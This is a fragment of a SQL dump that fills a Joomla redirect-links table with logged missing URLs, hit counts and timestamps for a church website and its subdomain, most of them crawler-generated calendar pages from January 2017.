(2021, 'http://lifeoasisinternationalchurch.org/lndex.php', NULL, 'lifeoasisinternationalchurch.org', '', 4, 0, '2017-01-17 12:05:10', '0000-00-00 00:00:00', 301),
(2022, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/47-prayer-a-fasting-day-36', NULL, '', '', 16, 0, '2017-01-17 15:24:20', '0000-00-00 00:00:00', 301),
(2023, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 1, 0, '2017-01-17 16:09:58', '0000-00-00 00:00:00', 301),
(2024, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/11/-', NULL, '', '', 1, 0, '2017-01-17 16:23:11', '0000-00-00 00:00:00', 301),
(2025, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/13/-', NULL, '', '', 1, 0, '2017-01-17 16:23:12', '0000-00-00 00:00:00', 301),
(2026, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/12/-', NULL, '', '', 1, 0, '2017-01-17 16:23:18', '0000-00-00 00:00:00', 301),
(2027, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/3/-', NULL, '', '', 1, 0, '2017-01-17 16:23:28', '0000-00-00 00:00:00', 301),
(2028, 'http://www.lifeoasisinternationalchurch.org/index.php/172-day8', NULL, '', '', 8, 0, '2017-01-17 16:23:35', '0000-00-00 00:00:00', 301),
(2029, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1875/3/-', NULL, '', '', 1, 0, '2017-01-17 16:23:41', '0000-00-00 00:00:00', 301),
(2030, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/8/-', NULL, '', '', 1, 0, '2017-01-17 16:24:10', '0000-00-00 00:00:00', 301),
(2031, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1877/6/-', NULL, '', '', 1, 0, '2017-01-17 16:24:24', '0000-00-00 00:00:00', 301),
(2032, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1875/8/-', NULL, '', '', 1, 0, '2017-01-17 16:24:52', '0000-00-00 00:00:00', 301),
(2033, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1876/7/-', NULL, '', '', 1, 0, '2017-01-17 16:25:08', '0000-00-00 00:00:00', 301),
(2034, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/17/-', NULL, '', '', 1, 0, '2017-01-17 16:25:20', '0000-00-00 00:00:00', 301),
(2035, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/10/-', NULL, '', '', 1, 0, '2017-01-17 16:25:33', '0000-00-00 00:00:00', 301),
(2036, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/5/-', NULL, '', '', 1, 0, '2017-01-17 16:26:00', '0000-00-00 00:00:00', 301),
(2037, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1876/9/-', NULL, '', '', 1, 0, '2017-01-17 16:26:02', '0000-00-00 00:00:00', 301),
(2038, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/18/-', NULL, '', '', 1, 0, '2017-01-17 16:26:14', '0000-00-00 00:00:00', 301),
(2039, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/11/-', NULL, '', '', 1, 0, '2017-01-17 16:26:27', '0000-00-00 00:00:00', 301),
(2040, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/6/-', NULL, '', '', 1, 0, '2017-01-17 16:26:44', '0000-00-00 00:00:00', 301),
(2041, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/11/-', NULL, '', '', 1, 0, '2017-01-17 16:26:53', '0000-00-00 00:00:00', 301),
(2042, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/5/-', NULL, '', '', 1, 0, '2017-01-17 16:27:06', '0000-00-00 00:00:00', 301),
(2043, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/8/-', NULL, '', '', 1, 0, '2017-01-17 16:27:18', '0000-00-00 00:00:00', 301),
(2044, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/24/-', NULL, '', '', 1, 0, '2017-01-17 16:27:43', '0000-00-00 00:00:00', 301),
(2045, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1877/10/-', NULL, '', '', 1, 0, '2017-01-17 16:27:56', '0000-00-00 00:00:00', 301),
(2046, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/10/-', NULL, '', '', 1, 0, '2017-01-17 16:28:08', '0000-00-00 00:00:00', 301),
(2047, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/16/-', NULL, '', '', 1, 0, '2017-01-17 16:28:26', '0000-00-00 00:00:00', 301),
(2048, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/30/-', NULL, '', '', 1, 0, '2017-01-17 16:28:33', '0000-00-00 00:00:00', 301),
(2049, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/10/-', NULL, '', '', 1, 0, '2017-01-17 16:28:44', '0000-00-00 00:00:00', 301),
(2050, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1878/11/-', NULL, '', '', 1, 0, '2017-01-17 16:29:21', '0000-00-00 00:00:00', 301),
(2051, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/9/-', NULL, '', '', 1, 0, '2017-01-17 16:30:04', '0000-00-00 00:00:00', 301),
(2052, 'http://www.lifeoasisinternationalchurch.org/index.php/135-day1', NULL, '', '', 6, 0, '2017-01-17 16:30:34', '0000-00-00 00:00:00', 301),
(2053, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/1/-', NULL, '', '', 1, 0, '2017-01-17 16:30:52', '0000-00-00 00:00:00', 301),
(2054, 'http://www.lifeoasisinternationalchurch.org/template-info/2-uncategorised/47-videos', NULL, '', '', 5, 0, '2017-01-17 16:35:25', '0000-00-00 00:00:00', 301),
(2055, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/48-prayer-a-fasting-day-37', NULL, '', '', 12, 0, '2017-01-17 16:39:53', '0000-00-00 00:00:00', 301),
(2056, 'http://www.lifeoasisinternationalchurch.org/loic/index.htm', NULL, '', '', 1, 0, '2017-01-17 17:03:41', '0000-00-00 00:00:00', 301),
(2057, 'http://www.lifeoasisinternationalchurch.org/loic/index.html', NULL, '', '', 1, 0, '2017-01-17 17:03:43', '0000-00-00 00:00:00', 301),
(2058, 'http://www.lifeoasisinternationalchurch.org/event/index.php', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php', '', 1, 0, '2017-01-17 17:05:22', '0000-00-00 00:00:00', 301),
(2059, 'http://www.lifeoasisinternationalchurch.org/index.php/173-day-9', NULL, '', '', 4, 0, '2017-01-17 17:27:05', '0000-00-00 00:00:00', 301),
(2060, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermons', NULL, '', '', 36, 0, '2017-01-17 17:54:09', '0000-00-00 00:00:00', 301),
(2061, 'http://ljmti.lifeoasisinternationalchurch.org/joomla', NULL, '', '', 2, 0, '2017-01-17 18:05:33', '0000-00-00 00:00:00', 301),
(2062, 'http://www.lifeoasisinternationalchurch.org/index.php/131-20148', NULL, '', '', 5, 0, '2017-01-17 18:09:55', '0000-00-00 00:00:00', 301),
(2063, 'http://www.lifeoasisinternationalchurch.org/index.php/80-2014-2', NULL, '', '', 7, 0, '2017-01-17 18:14:03', '0000-00-00 00:00:00', 301),
(2064, 'http://ljmti.lifeoasisinternationalchurch.org/joomla/category-blog', NULL, '', '', 1, 0, '2017-01-17 18:14:27', '0000-00-00 00:00:00', 301),
(2065, 'http://www.lifeoasisinternationalchurch.org/index.php/152-day-25', NULL, '', '', 7, 0, '2017-01-17 20:12:54', '0000-00-00 00:00:00', 301),
(2066, 'http://www.lifeoasisinternationalchurch.org/index.php/164-day-36', NULL, '', '', 8, 0, '2017-01-17 20:12:59', '0000-00-00 00:00:00', 301),
(2067, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events', NULL, '', '', 1, 0, '2017-01-17 21:57:25', '0000-00-00 00:00:00', 301),
(2068, 'http://www.lifeoasisinternationalchurch.org/index.php/18-wifi-zion/33-wifizion-aims-objectives', NULL, '', '', 8, 0, '2017-01-17 22:07:08', '0000-00-00 00:00:00', 301),
(2069, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla/itemlist/tag/AudioJungle', NULL, '', '', 1, 0, '2017-01-17 22:30:55', '0000-00-00 00:00:00', 301),
(2070, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/55-prayer-a-fasting-day-6', NULL, '', '', 18, 0, '2017-01-17 22:32:20', '0000-00-00 00:00:00', 301),
(2071, 'http://lifeoasisinternationalchurch.org/11-demo-articles/54-slide-04', NULL, '', '', 1, 0, '2017-01-17 22:47:08', '0000-00-00 00:00:00', 301),
(2072, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/23/-', NULL, '', '', 1, 0, '2017-01-17 23:22:57', '0000-00-00 00:00:00', 301),
(2073, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/24/-', NULL, '', '', 1, 0, '2017-01-17 23:23:02', '0000-00-00 00:00:00', 301),
(2074, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/3/-', NULL, '', '', 1, 0, '2017-01-17 23:23:08', '0000-00-00 00:00:00', 301),
(2075, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/22/-', NULL, '', '', 1, 0, '2017-01-17 23:23:14', '0000-00-00 00:00:00', 301),
(2076, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/16/-', NULL, '', '', 1, 0, '2017-01-17 23:23:20', '0000-00-00 00:00:00', 301),
(2077, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/12/-', NULL, '', '', 1, 0, '2017-01-17 23:23:26', '0000-00-00 00:00:00', 301),
(2078, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/11/-', NULL, '', '', 1, 0, '2017-01-17 23:23:32', '0000-00-00 00:00:00', 301),
(2079, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/7/-', NULL, '', '', 1, 0, '2017-01-17 23:23:44', '0000-00-00 00:00:00', 301),
(2080, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/9/-', NULL, '', '', 1, 0, '2017-01-17 23:23:50', '0000-00-00 00:00:00', 301),
(2081, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/3/-', NULL, '', '', 1, 0, '2017-01-17 23:23:56', '0000-00-00 00:00:00', 301),
(2082, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/21/-', NULL, '', '', 1, 0, '2017-01-17 23:24:02', '0000-00-00 00:00:00', 301),
(2083, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/19/-', NULL, '', '', 1, 0, '2017-01-17 23:24:08', '0000-00-00 00:00:00', 301),
(2084, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/29/-', NULL, '', '', 1, 0, '2017-01-17 23:24:13', '0000-00-00 00:00:00', 301),
(2085, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/2/-', NULL, '', '', 1, 0, '2017-01-17 23:24:19', '0000-00-00 00:00:00', 301),
(2086, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/3/-', NULL, '', '', 1, 0, '2017-01-17 23:24:25', '0000-00-00 00:00:00', 301),
(2087, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1876/11/-', NULL, '', '', 1, 0, '2017-01-17 23:24:31', '0000-00-00 00:00:00', 301),
(2088, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/26/-', NULL, '', '', 1, 0, '2017-01-17 23:24:37', '0000-00-00 00:00:00', 301),
(2089, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/27/-', NULL, '', '', 1, 0, '2017-01-17 23:24:43', '0000-00-00 00:00:00', 301),
(2090, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/25/-', NULL, '', '', 1, 0, '2017-01-17 23:24:49', '0000-00-00 00:00:00', 301),
(2091, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/5/-', NULL, '', '', 1, 0, '2017-01-17 23:24:55', '0000-00-00 00:00:00', 301),
(2092, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/11/-', NULL, '', '', 1, 0, '2017-01-17 23:25:00', '0000-00-00 00:00:00', 301),
(2093, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/27/-', NULL, '', '', 1, 0, '2017-01-17 23:25:06', '0000-00-00 00:00:00', 301),
(2094, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/3/-', NULL, '', '', 1, 0, '2017-01-17 23:25:12', '0000-00-00 00:00:00', 301),
(2095, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/4/-', NULL, '', '', 1, 0, '2017-01-17 23:25:18', '0000-00-00 00:00:00', 301),
(2096, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/8/-', NULL, '', '', 1, 0, '2017-01-17 23:25:24', '0000-00-00 00:00:00', 301),
(2097, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/4/-', NULL, '', '', 1, 0, '2017-01-17 23:25:30', '0000-00-00 00:00:00', 301),
(2098, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/11/-', NULL, '', '', 1, 0, '2017-01-17 23:25:36', '0000-00-00 00:00:00', 301),
(2099, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/1/-', NULL, '', '', 1, 0, '2017-01-17 23:25:42', '0000-00-00 00:00:00', 301),
(2100, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/2/-', NULL, '', '', 1, 0, '2017-01-17 23:25:48', '0000-00-00 00:00:00', 301),
(2101, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/9/-', NULL, '', '', 1, 0, '2017-01-17 23:25:53', '0000-00-00 00:00:00', 301),
(2102, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1868/12/-', NULL, '', '', 1, 0, '2017-01-17 23:25:59', '0000-00-00 00:00:00', 301),
(2103, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/10/-', NULL, '', '', 1, 0, '2017-01-17 23:26:05', '0000-00-00 00:00:00', 301),
(2104, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/1/-', NULL, '', '', 1, 0, '2017-01-17 23:26:11', '0000-00-00 00:00:00', 301),
(2105, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/20/-', NULL, '', '', 1, 0, '2017-01-17 23:26:17', '0000-00-00 00:00:00', 301),
(2106, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/11/-', NULL, '', '', 1, 0, '2017-01-17 23:26:23', '0000-00-00 00:00:00', 301),
(2107, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/4/-', NULL, '', '', 1, 0, '2017-01-17 23:26:29', '0000-00-00 00:00:00', 301),
(2108, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/16/-', NULL, '', '', 1, 0, '2017-01-17 23:26:35', '0000-00-00 00:00:00', 301),
(2109, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/9/-', NULL, '', '', 1, 0, '2017-01-17 23:26:41', '0000-00-00 00:00:00', 301),
(2110, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/5/-', NULL, '', '', 1, 0, '2017-01-17 23:26:46', '0000-00-00 00:00:00', 301),
(2111, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/9/-', NULL, '', '', 1, 0, '2017-01-17 23:26:52', '0000-00-00 00:00:00', 301),
(2112, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/1/-', NULL, '', '', 1, 0, '2017-01-17 23:26:58', '0000-00-00 00:00:00', 301),
(2113, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/8/-', NULL, '', '', 1, 0, '2017-01-17 23:27:04', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(2114, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/22/-', NULL, '', '', 1, 0, '2017-01-17 23:27:10', '0000-00-00 00:00:00', 301),
(2115, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/1/-', NULL, '', '', 1, 0, '2017-01-17 23:27:16', '0000-00-00 00:00:00', 301),
(2116, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/2/-', NULL, '', '', 1, 0, '2017-01-17 23:27:22', '0000-00-00 00:00:00', 301),
(2117, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/9/-', NULL, '', '', 1, 0, '2017-01-17 23:27:28', '0000-00-00 00:00:00', 301),
(2118, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1868/11/-', NULL, '', '', 1, 0, '2017-01-17 23:27:34', '0000-00-00 00:00:00', 301),
(2119, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/10/-', NULL, '', '', 1, 0, '2017-01-17 23:27:40', '0000-00-00 00:00:00', 301),
(2120, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/12/-', NULL, '', '', 1, 0, '2017-01-17 23:27:46', '0000-00-00 00:00:00', 301),
(2121, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/8/-', NULL, '', '', 1, 0, '2017-01-17 23:27:54', '0000-00-00 00:00:00', 301),
(2122, 'http://www.lifeoasisinternationalchurch.org/loicgallery/lib/yui/', NULL, '', '', 2, 0, '2017-01-18 00:20:31', '0000-00-00 00:00:00', 301),
(2123, 'http://lifeoasisinternationalchurch.org/template-info-2/our-service-schedule', NULL, '', '', 22, 0, '2017-01-18 00:20:36', '0000-00-00 00:00:00', 301),
(2124, 'http://www.lifeoasisinternationalchurch.org/simmp', NULL, '', '', 7, 0, '2017-01-18 00:34:52', '0000-00-00 00:00:00', 301),
(2125, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/20-welcome', NULL, '', '', 7, 0, '2017-01-18 01:53:05', '0000-00-00 00:00:00', 301),
(2126, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 2, 0, '2017-01-18 01:59:30', '0000-00-00 00:00:00', 301),
(2127, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/20-welcome', NULL, '', '', 2, 0, '2017-01-18 02:20:43', '0000-00-00 00:00:00', 301),
(2128, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2', NULL, '', '', 23, 0, '2017-01-18 05:22:03', '0000-00-00 00:00:00', 301),
(2129, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/12', NULL, '', '', 4, 0, '2017-01-18 05:57:38', '0000-00-00 00:00:00', 301),
(2130, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6', NULL, '', '', 1, 0, '2017-01-18 06:05:27', '0000-00-00 00:00:00', 301),
(2131, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=HTML5&Itemid=775', NULL, '', '', 1, 0, '2017-01-18 07:01:41', '0000-00-00 00:00:00', 301),
(2132, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/11/-', NULL, '', '', 1, 0, '2017-01-18 07:46:52', '0000-00-00 00:00:00', 301),
(2133, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/7/-', NULL, '', '', 1, 0, '2017-01-18 07:46:57', '0000-00-00 00:00:00', 301),
(2134, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/15/-', NULL, '', '', 1, 0, '2017-01-18 07:47:02', '0000-00-00 00:00:00', 301),
(2135, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/2/-', NULL, '', '', 1, 0, '2017-01-18 07:47:04', '0000-00-00 00:00:00', 301),
(2136, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/5/-', NULL, '', '', 1, 0, '2017-01-18 07:47:10', '0000-00-00 00:00:00', 301),
(2137, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/26/-', NULL, '', '', 1, 0, '2017-01-18 07:47:21', '0000-00-00 00:00:00', 301),
(2138, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/4/-', NULL, '', '', 1, 0, '2017-01-18 07:47:27', '0000-00-00 00:00:00', 301),
(2139, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/3/-', NULL, '', '', 1, 0, '2017-01-18 07:47:32', '0000-00-00 00:00:00', 301),
(2140, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/31/-', NULL, '', '', 1, 0, '2017-01-18 07:47:39', '0000-00-00 00:00:00', 301),
(2141, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/19/-', NULL, '', '', 1, 0, '2017-01-18 07:48:04', '0000-00-00 00:00:00', 301),
(2142, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/18/-', NULL, '', '', 1, 0, '2017-01-18 07:48:07', '0000-00-00 00:00:00', 301),
(2143, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1868/2/-', NULL, '', '', 1, 0, '2017-01-18 07:48:11', '0000-00-00 00:00:00', 301),
(2144, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/25/-', NULL, '', '', 1, 0, '2017-01-18 07:48:14', '0000-00-00 00:00:00', 301),
(2145, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/14/-', NULL, '', '', 1, 0, '2017-01-18 07:48:16', '0000-00-00 00:00:00', 301),
(2146, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/26/-', NULL, '', '', 1, 0, '2017-01-18 07:48:18', '0000-00-00 00:00:00', 301),
(2147, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/6/-', NULL, '', '', 1, 0, '2017-01-18 07:48:25', '0000-00-00 00:00:00', 301),
(2148, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/9/-', NULL, '', '', 1, 0, '2017-01-18 07:48:32', '0000-00-00 00:00:00', 301),
(2149, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/14/-', NULL, '', '', 1, 0, '2017-01-18 07:48:39', '0000-00-00 00:00:00', 301),
(2150, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/5/-', NULL, '', '', 1, 0, '2017-01-18 07:48:46', '0000-00-00 00:00:00', 301),
(2151, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/17/-', NULL, '', '', 1, 0, '2017-01-18 07:48:53', '0000-00-00 00:00:00', 301),
(2152, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1870/7/-', NULL, '', '', 1, 0, '2017-01-18 07:49:00', '0000-00-00 00:00:00', 301),
(2153, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/18/-', NULL, '', '', 1, 0, '2017-01-18 07:49:07', '0000-00-00 00:00:00', 301),
(2154, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/22/-', NULL, '', '', 1, 0, '2017-01-18 07:49:14', '0000-00-00 00:00:00', 301),
(2155, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/5/-', NULL, '', '', 1, 0, '2017-01-18 07:49:29', '0000-00-00 00:00:00', 301),
(2156, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/7/-', NULL, '', '', 1, 0, '2017-01-18 07:49:34', '0000-00-00 00:00:00', 301),
(2157, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1871/6/-', NULL, '', '', 1, 0, '2017-01-18 07:49:41', '0000-00-00 00:00:00', 301),
(2158, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1872/6/-', NULL, '', '', 1, 0, '2017-01-18 07:49:48', '0000-00-00 00:00:00', 301),
(2159, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/15/-', NULL, '', '', 1, 0, '2017-01-18 07:49:55', '0000-00-00 00:00:00', 301),
(2160, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/23/-', NULL, '', '', 1, 0, '2017-01-18 07:50:09', '0000-00-00 00:00:00', 301),
(2161, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/9/-', NULL, '', '', 1, 0, '2017-01-18 07:50:17', '0000-00-00 00:00:00', 301),
(2162, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/6/-', NULL, '', '', 1, 0, '2017-01-18 07:50:23', '0000-00-00 00:00:00', 301),
(2163, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1868/3/-', NULL, '', '', 1, 0, '2017-01-18 07:50:30', '0000-00-00 00:00:00', 301),
(2164, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/12/-', NULL, '', '', 1, 0, '2017-01-18 07:50:37', '0000-00-00 00:00:00', 301),
(2165, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/7/-', NULL, '', '', 1, 0, '2017-01-18 07:50:44', '0000-00-00 00:00:00', 301),
(2166, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/5/-', NULL, '', '', 1, 0, '2017-01-18 07:50:51', '0000-00-00 00:00:00', 301),
(2167, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1868/4/-', NULL, '', '', 1, 0, '2017-01-18 07:50:58', '0000-00-00 00:00:00', 301),
(2168, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/6/-', NULL, '', '', 1, 0, '2017-01-18 07:51:04', '0000-00-00 00:00:00', 301),
(2169, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1873/5/-', NULL, '', '', 1, 0, '2017-01-18 07:51:17', '0000-00-00 00:00:00', 301),
(2170, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/12/-', NULL, '', '', 1, 0, '2017-01-18 07:51:18', '0000-00-00 00:00:00', 301),
(2171, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1874/6/-', NULL, '', '', 1, 0, '2017-01-18 07:51:27', '0000-00-00 00:00:00', 301),
(2172, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/4/-', NULL, '', '', 1, 0, '2017-01-18 07:51:32', '0000-00-00 00:00:00', 301),
(2173, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/5/-', NULL, '', '', 1, 0, '2017-01-18 07:51:39', '0000-00-00 00:00:00', 301),
(2174, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/5/-', NULL, '', '', 1, 0, '2017-01-18 07:51:46', '0000-00-00 00:00:00', 301),
(2175, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/17/-', NULL, '', '', 1, 0, '2017-01-18 07:51:54', '0000-00-00 00:00:00', 301),
(2176, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/23/-', NULL, '', '', 1, 0, '2017-01-18 07:52:01', '0000-00-00 00:00:00', 301),
(2177, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/19/-', NULL, '', '', 1, 0, '2017-01-18 07:52:07', '0000-00-00 00:00:00', 301),
(2178, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1874/5/-', NULL, '', '', 1, 0, '2017-01-18 07:52:14', '0000-00-00 00:00:00', 301),
(2179, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/3/-', NULL, '', '', 1, 0, '2017-01-18 07:52:21', '0000-00-00 00:00:00', 301),
(2180, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/6/-', NULL, '', '', 1, 0, '2017-01-18 07:52:28', '0000-00-00 00:00:00', 301),
